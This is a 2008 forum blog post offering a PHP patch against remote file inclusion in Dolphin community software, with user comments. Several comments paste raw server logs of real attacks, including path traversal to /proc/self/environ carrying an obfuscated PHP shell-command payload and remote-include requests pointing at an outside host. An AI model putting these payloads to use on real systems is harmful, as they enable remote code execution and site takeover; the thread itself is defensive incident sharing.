Fix for dolphin exploit

sammie posted 15th of July 2008 in Community Voice. 32 comments.

add the fllowing code to your ray/modules/global/inc/content.inc.php

add it at the top above the 1st require once command

if (isset($_REQUEST['sIncPath']))
die ('Hacking attempt');

so it looks like this :

if (isset($_REQUEST['sIncPath']))
die ('Hacking attempt');

require_once($sIncPath . "xml.inc.php");
require_once($sIncPath . "constants.inc.php");
require_once($sIncPath . "apiFunctions.inc.php");

this stops any remote includes being used

next edit /plugins/safehtml/HTMLSax3.php  add this at the top above the require once

if (isset($_REQUEST['dir']))
die ('Hacking attempt');

so it looks like this:

if (isset($_REQUEST['dir']))
die ('Hacking attempt');

require_once( "{$dir['plugins']}safehtml/HTMLSax3/States.php" );
require_once( "{$dir['plugins']}safehtml/HTMLSax3/Decorators.php" );

this stops remote access to your directories

 
Comments
·Oldest
·Top
Please login to post a comment.
paramike
paramike15th of July 2008
 
Thank you so very much ...
PermalinkReplyPlus0 pluses
sammie
sammie15th of July 2008
 
you are most welcome sweetie, hey it was only $30 so well worth it to make sure i dont get hacked too, but they looked over my server and told me its secure and that fix will kill remote attack attempts on dolphin. as soon as i tested my site still works and can still upload and post on the forums, its cool i posted it here.
PermalinkReplyPlus0 pluses
shaneed
shaneed16th of July 2008to sammie
 
Hi sammie. I'm using Dreamweaver to access my Dolphin to edit files. That is also called remote access. If i add those codes would i still be able to edit files using Dreamweaver?
PermalinkReplyPlus0 pluses
clubk1d
clubk1d15th of July 2008
 
thanks for sharing!!! :D
PermalinkReplyPlus0 pluses
AndreyP
AndreyP15th of July 2008
 
Sammy, good :)
PS we involved to making fast-fix-patch that close all such holes in security for old PHP versions to prevent change variables via GET params, or if register globals is On,
Also we close another security holes (just because here not only this way to hack any sites)
I spend several days and found many ways to hack any sites. So register globals and all fixes above just more simpliest and old way :)
PermalinkReplyPlus0 pluses
sammie
sammie15th of July 2008to AndreyP
 
ty sweetie, coming from you that means a lot. and glad i could help. that should kill all attacks.
i was never hacked, but i wanted to be 100% sure my server was secure so asked them to look at the attacks and fix it. thats what they came up with, but they also said there is still some questionable code in the content.inc.php file
PermalinkReplyPlus0 pluses
DoLaugh
DoLaugh15th of July 2008
 
Sammie, thanks, hopefully we can return the favor down the road!

DoLaugh
PermalinkReplyPlus0 pluses
sammie
sammie15th of July 2008to DoLaugh
 
anytime sweetie, hope a lot more members can sleep better tonight.
PermalinkReplyPlus0 pluses
jerry79
jerry7916th of July 2008
 
Thanks a lot Sammie! First i thought its another "how to safe my site" post as the others. ;) But it contains new informations on how to ge rid of some hackers. Thanks for your share! Ill update my files!

Greets,
Jerry
PermalinkReplyPlus0 pluses
Stuart038
Stuart03816th of July 2008
 
Sammie, many thanks. Very generous!!

All the best.

Stuart
Ps. what was that about questionable code...?
PermalinkReplyPlus0 pluses
sammie
sammie16th of July 2008to Stuart038
 
they told me there is some questionable code in ray/modules/global/inc/content.inc.php

i am not a programmer so didnt ask, and they might have charged me more lol

i think boonex are working on that file now to solve the issues.
PermalinkReplyPlus0 pluses
clubk1d
clubk1d16th of July 2008
 
don't forget also to thank all folks out there who spend some time, just to keep your websites clean and clear from any bugs and intruders! :)
PermalinkReplyPlus0 pluses
gameutopia
gameutopia16th of July 2008
 
Thanks for posting this. Even if it's not the official patch maybe it will help a few folks while we await the official word. Any time something like this is posted I'm certainly going to look into it and check it out. Thanks Again!!
PermalinkReplyPlus0 pluses
sammie
sammie16th of July 2008
 
there is another exploit found that can affect sites with register globals off, i am hoping to have a patch for this tomorrow. boonex have been informed so hope they can include it in their patch, but it might delay their patch a little longer
PermalinkReplyPlus0 pluses
Habitual
Habitual28th of August 2008
 
Sammie:
thanks for the code mod snippets.
I work at hfw and am attempting to put this to use on one of the Dolphin installs that repeatedly gets suspended from RFI injections, etc...(seems like all I do is chase this exploit around.)

boonex says it's our register_globals=on on our VPSs.
We'd like to think it's the 777 perm'd directories
but I have seen RFIs even with it off.

Believe me, I want to see this activity solved once and for all.
I remain hopeful.

You mentioned "here see more is another exploit found" : can you elaborate, if not openly then some other way?
PermalinkReplyPlus0 pluses
ken707
ken70722nd of September 2008
 
My index.php was hacked.

Trying this mod now. My site has been hacked several times after the dolphin security fix. I have followed all security instructions and keeping getting hacked through Boonex scripts.
PermalinkReplyPlus0 pluses
ken707
ken70722nd of September 2008
 
hack code used on my site,

//plugins/safehtml/safehtml.php?dir[plugins]=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 617 "-" "<? $x0e=\"\\145x\\x65\\x63\"; $x0f=\"\\x66eo\\146\"; $x10=\"\\x66\\x72ea\\x64\"; $x11=\"\\146un\\x63\\164io\\x6e\\x5f\\x65x\\151s\\x74\\x73\"; $x12=\"i\\163\\x5f\\162\\x65s\\157ur\\x63\\x65\"; $x13=\"\\152\\157\\x69\\156\"; $x14=\"o\\142_g\\145t\\x5f\\x63o\\156\\164en\\x74\\x73\"; see more $x15=\"ob\\137\\x65\\156d\\137\\x63lea\\156\"; $x16=\"\\x6fb_st\\x61\\x72\\164\"; $x17=\"\\x70\\141\\163s\\164\\x68\\162\\165\"; $x18=\"\\x70\\143\\154ose\"; $x19=\"p\\157\\160e\\x6e\"; $x1a=\"\\163h\\145\\154l\\137\\x65\\170e\\143\"; $x1b=\"\\x73\\x79s\\x74e\\x6d\"; function x0b($x0b){ global $x0e,$x0f,$x10,$x11,$x12,$x13,$x14,$x15,$x16,$x17,$x18,$x19,$x1a,$x1b; $x0c = ''; if (!empty($x0b)) {if($x11('exec')) {@$x0e($x0b,$x0c);$x0c = $x13(\"\\n\",$x0c); }elseif($x11('shell_exec')) {$x0c = @$x1a($x0b); }elseif($x11('system')) {@$x16();@$x1b($x0b);$x0c = @$x14();@$x15(); }elseif($x11('passthru')) {@$x16();@$x17($x0b);$x0c = @$x14();@$x15(); }elseif(@$x12($x0d = @$x19($x0b,\"\\x72\"))){ $x0c = \"\"; while(!@$x0f($x0d)) { $x0c .= @$x10($x0d,1024); } @$x18($x0d);} } return $x0c;}echo x0b(\"ec\\150\\157\\x20c\\1624n\\153\\137\\x72oc\\153s\");?>"
PermalinkReplyPlus0 pluses
ken707
ken70722nd of September 2008
 
more

83.64.48.195 - - [19/Sep/2008:20:38:46 -0400] "GET //plugins/safehtml/HTMLSax3.php?dir[plugins]=http://www.vogelgesang-av.de/cache/DONTDELETEFAGOT/i??? HTTP/1.1" 200 638 "-" "http://cr4nk.ws/ [de] (Windows 3.1; I) [crank]"
83.64.48.195 - - [19/Sep/2008:20:38:46 -0400] "GET /errors.php?error=http://www.vogelgesang-av.de/cache/DONTDELETEFAGOT/i??? HTTP/1.1" 404 1550 "-" "http://cr4nk.ws/ [de] (Windows 3.1; I) [crank]"
83.64.48.195 see more - - [19/Sep/2008:20:38:47 -0400] "GET //plugins/safehtml/HTMLSax3.php?dir[plugins]=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 638 "-" "<? $x0e=\"\\145x\\x65\\x63\"; $x0f=\"\\x66eo\\146\"; $x10=\"\\x66\\x72ea\\x64\"; $x11=\"\\146un\\x63\\164io\\x6e\\x5f\\x65x\\151s\\x74\\x73\"; $x12=\"i\\163\\x5f\\162\\x65s\\157ur\\x63\\x65\"; $x13=\"\\152\\157\\x69\\156\"; $x14=\"o\\142_g\\145t\\x5f\\x63o\\156\\164en\\x74\\x73\"; $x15=\"ob\\137\\x65\\156d\\137\\x63lea\\156\"; $x16=\"\\x6fb_st\\x61\\x72\\164\"; $x17=\"\\x70\\141\\163s\\164\\x68\\162\\165\"; $x18=\"\\x70\\143\\154ose\"; $x19=\"p\\157\\160e\\x6e\"; $x1a=\"\\163h\\145\\154l\\137\\x65\\170e\\143\"; $x1b=\"\\x73\\x79s\\x74e\\x6d\"; function x0b($x0b){ global $x0e,$x0f,$x10,$x11,$x12,$x13,$x14,$x15,$x16,$x17,$x18,$x19,$x1a,$x1b; $x0c = ''; if (!empty($x0b)) {if($x11('exec')) {@$x0e($x0b,$x0c);$x0c = $x13(\"\\n\",$x0c); }elseif($x11('shell_exec')) {$x0c = @$x1a($x0b); }elseif($x11('system')) {@$x16();@$x1b($x0b);$x0c = @$x14();@$x15(); }elseif($x11('passthru')) {@$x16();@$x17($x0b);$x0c = @$x14();@$x15(); }elseif(@$x12($x0d = @$x19($x0b,\"\\x72\"))){ $x0c = \"\"; while(!@$x0f($x0d)) { $x0c .= @$x10($x0d,1024); } @$x18($x0d);} } return $x0c;}echo x0b(\"ec\\150\\157\\x20c\\1624n\\153\\137\\x72oc\\153s\");?>"
83.64.48.195 - - [19/Sep/2008:20:38:48 -0400] "GET //plugins/safehtml/HTMLSax3.php?dir[plugins]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 638 "-" "<? $x0e=\"\\145x\\x65\\x63\"; $x0f=\"\\x66eo\\146\"; $x10=\"\\x66\\x72ea\\x64\"; $x11=\"\\146un\\x63\\164io\\x6e\\x5f\\x65x\\151s\\x74\\x73\"; $x12=\"i\\163\\x5f\\162\\x65s\\157ur\\x63\\x65\"; $x13=\"\\152\\157\\x69\\156\"; $x14=\"o\\142_g\\145t\\x5f\\x63o\\156\\164en\\x74\\x73\"; $x15=\"ob\\137\\x65\\156d\\137\\x63lea\\156\"; $x16=\"\\x6fb_st\\x61\\x72\\164\"; $x17=\"\\x70\\141\\163s\\164\\x68\\162\\165\"; $x18=\"\\x70\\143\\154ose\"; $x19=\"p\\157\\160e\\x6e\"; $x1a=\"\\163h\\145\\154l\\137\\x65\\170e\\143\"; $x1b=\"\\x73\\x79s\\x74e\\x6d\"; function x0b($x0b){ global $x0e,$x0f,$x10,$x11,$x12,$x13,$x14,$x15,$x16,$x17,$x18,$x19,$x1a,$x1b; $x0c = ''; if (!empty($x0b)) {if($x11('exec')) {@$x0e($x0b,$x0c);$x0c = $x13(\"\\n\",$x0c); }elseif($x11('shell_exec')) {$x0c = @$x1a($x0b); }elseif($x11('system')) {@$x16();@$x1b($x0b);$x0c = @$x14();@$x15(); }elseif($x11('passthru')) {@$x16();@$x17($x0b);$x0c = @$x14();@$x15(); }elseif(@$x12($x0d = @$x19($x0b,\"\\x72\"))){ $x0c = \"\"; while(!@$x0f($x0d)) { $x0c .= @$x10($x0d,1024); } @$x18($x0d);} } return $x0c;}echo x0b(\"ec\\150\\157\\x20c\\1624n\\153\\137\\x72oc\\153s\");?>"
PermalinkReplyPlus0 pluses
ken707
ken70722nd of September 2008
 
more

/ray/XML.php?action=getSettingValue&key=status&widget=youtube&file=main&_t=19
PermalinkReplyPlus0 pluses
ken707
ken70722nd of September 2008
 
more
POSSIBLE

/plugins/tiny_mce/tiny_mce_gzip.php?js=true&diskcache=true&core=true&suffix=&themes=simple%2Cadvanced&plugins=style%2Clayer%2Ctable%2Csave%2Cadvhr%2Cadvimage%2Cadvlink%2Cemotions%2Ciespell%2Cinsertdatetime%2Cpreview%2Cmedia%2Csearchreplace%2Cprint%2Ccontextmenu%2Cpaste%2Cdirectionality%2Cfullscreen%2Cnoneditable%2Cvisualchars%2Cnonbreaking%2Cxhtmlxtras&languages=en
PermalinkReplyPlus0 pluses
kinder
kinder16th of October 2008
 
thx sammie, no troubles yet, but hope to keep it this way. thx for sharing.
PermalinkReplyPlus0 pluses
corfukids
corfukids21st of November 2008
 
my look like this Why? anyideas anyone? i getting hacked all the time?

i have an extra row as you can see header.inc

require_once('header.inc.php');
require_once($sIncPath . "xml.inc.php");
require_once($sIncPath . "constants.inc.php");
require_once($sIncPath . "apiFunctions.inc.php");
PermalinkReplyPlus0 pluses
sammie
sammie26th of November 2008
 
Because you have the updated version
you can still apply the patch if you wish. but you should be safe is you are on a server with register_globals off
PermalinkReplyPlus0 pluses
WDBArnyVee
WDBArnyVee11th of January 2009
 
With 7.0 and the 'extras' being incorporated or integrated into the Dolphin script, will we have to continue to do these file edits like these, you think?
PermalinkReplyPlus0 pluses
BigWil
BigWil21st of March 2009
 
Wow these kiddies are very persistent even with the latest versions. You would have thought their makers would have included a version check. My logs are full of the sIncPath attempts. Of course thats my mod_security logs that are full so they are getting nothing but a 403 error. Still though digging through the logs is a pain.
PermalinkReplyPlus0 pluses
 
 
Home
Features
Pricing
Hosting
Support
About
StartDemo
Below is the legacy version of the Boonex site, maintained for Dolphin.Pro 7.x support.
The new Dolphin solution is powered by UNA Community Management System.

Blogs

Dolphin.Pro News
BoonEx News
Our Journey
Social Software World
Community Voice

Help

Support Forums
Documentation
BoonEx at GitHub
Custom Jobs
Contact Support Team

Product

Dolphin.Pro Features
Live Demo & Sandbox
Download Packages
Pricing & Order
Contact Sales Team

Company

Contact Us
About BoonEx
Privacy Policy
Terms & Conditions
© BoonEx Pty Ltd
SSL
© BoonEx
Home
Features
Pricing
Support
Hosting
About
Demo
PET:0.077268123626709